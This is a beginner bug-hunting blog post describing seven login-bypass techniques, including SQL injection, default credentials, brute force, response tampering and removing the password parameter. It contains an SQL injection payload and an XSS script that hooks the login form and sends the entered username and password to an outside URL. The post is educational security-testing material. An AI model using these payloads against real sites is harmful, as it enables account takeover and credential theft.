Seven Common Ways To Bypass Login Page

Uttam Gupta

Date: August 19, 2023

 

Hellooo to all beginner bug hunting fellows. This is Uttam Gupta, today i came with an another blog on login page. This blog is about bypassing the login page functionality which happens due to the weaknesses of the site. There are many ways to bypass login page functionality but in this blog we are discussing about some common ways. So let’s start…..

 

We are talking about these seven ways —

  1. Bypass by SQL Injection
  2. By Cross Site Scripting(XSS)
  3. By Manipulating the Response
  4. Bypass by Brute Force Attack
  5. Bypass by Directory Fuzzing Attack
  6. Bypass by Default credentials
  7. By Removing Parameter in Request

Bypass by SQL Injection

I am taking an example of Mutillidae for demonstration.

So now we can put the SQL injection payload in it. For this syntax error the payload is “ ‘ or 1=1- -” now let’s see what happen when enter it.

Boooom!! we are logged in as an admin. In your case try other payloads when it not working and also use SQLMap tool for dump the usernames and passwords.

By Cross Site Scripting(XSS)

Enter the xss payload <script>alert(1)</script> and it shows the popup, so you can try CSRF via XSS and see the victims credentials. This is the CSRF payload for it —

<script>
function intercept() {
 
 var user = document.forms[0].elements[0].value;
 var pass = document.forms[0].elements[1].value;
 
 
 var xhr = new XMLHttpRequest();
 
 xhr.open("GET", "https://your-target-url?username/email="+user+"&password="+pass)
 xhr.send();
return false;
 }
 document.forms[0].onsubmit = intercept;
 
</script>

Password Stealing From HTTPS Login Page & CSRF Protection Bypass With Reflected XSS

I have recently passed JavaScript for Pentesters exam from Pentester Academy

medium.com

 

Read this blog for learn in detail about this method.

By Manipulating the Response

This method mainly based on Response Status code manipulation and Response Body manipulation. First of all make an account on your target then login with correct credentials and intercepts request in burp suite and analyze the response after that you try to login with wrong credentials and manipulate the response as you see it with your correct credentials like

403 Forbidden
<redacted>
{"error":true, "message":"Invalid Token"}
200 OK
<redacted>
{"success":true}

If this weakness is exist you will be logged in on site.

Bypass by Brute Force Attack

This attack mainly occur when site does not set the time limit and repeating limit, basically does not set time delay function on login page. When you enter repeatedly wrong credentials and site show the time like enter credentials after 5 minutes. When site show this kind of error so it difficult to do this method. I have written a blog about brute force attack, its link is given below see it how to do this attack.

#1 How to perform Login Brute Force using Burp Suite.

First of all, intercept the login page request in Burp Suite. Then send the request in Intruder( ctrl + I ).

medium.com

 

#2 Broken brute-force protection, IP block.

In this, we can see that after too many failed login attempts our IP gets blocked.

medium.com

 

Bypass by Directory Fuzzing Attack

In this method, we try to do directory brute forcing with the help some tools like ffuf, dirbuster and burp suite intruder etc. Most of the tools have its own directory wordlist but when its not have wordlist so in linux it have own wordlist you use them for windows you can search on google.

In this attack may be possible, tool can find any directory or subdirectory which show useful response or open any page which only open when you logged in site. I have used the FFUF tool in this blog you can see how it works.

#8 Subdomain Enumeration — How to find Subdomains of any Domain

Hello, I have come today with a very useful topic of recon. In this blog we will see how to find Subdomain of any…

medium.com

 

Bypass by Default credentials

When the developer creates the site, he creates some default credentials for testing and many times it happens that he removes it or many times he does not remove it from the record. And when the site allows any password to be entered, many users can enter weak passwords and site accept it. So you should try the default credentials. Default credentials lists become easily available on Google. Default credentials like admin:admin, admin:password, username:pass12345 etc.

By Removing Parameter in Request

When you enter wrong credentials the site shows error like username and password is incorrect/does not match, password is incorrect for this username etc, this type of response is shown by the site so can try this method Huh. First you intercept the request and remove the password parameter in the request and forward the request. Then the server sees that the username is available and logs you in to the site. This problem occurs when the server does not analyze the request properly.

These are some ways hopefully you enjoy it and learn something new with this blog. So that’s it for today’s blog, see you in the next blog. Thank You For Reading.

Be An Ethical Hacker.

Recent Posts:

Smartphone Buying Guide 2024China Unveils a 50-Year Nuclear BatteryKochi Metro's WhatsApp Tickets for Easy Rides Means No More Queues!JEE Main 2024 Exam Centres in KeralaInstallation of Metasploitable 2 MachineVMware Workstation 17 ProEthical hacking full courseHow to use ./, ../ and / in HTML for src and href attributesCreate Multiple Certificates in Adobe PhotoshopUnlock Your Path to a Secure Future: TryHackMe's New Security Engineer Learning PathSupercharge Your Cybersecurity Careerburpsuite pro installation Central Government Pays Back MoneyDemon Slayer: Kimetsu no YaibaProfile Comparison by Chat GPT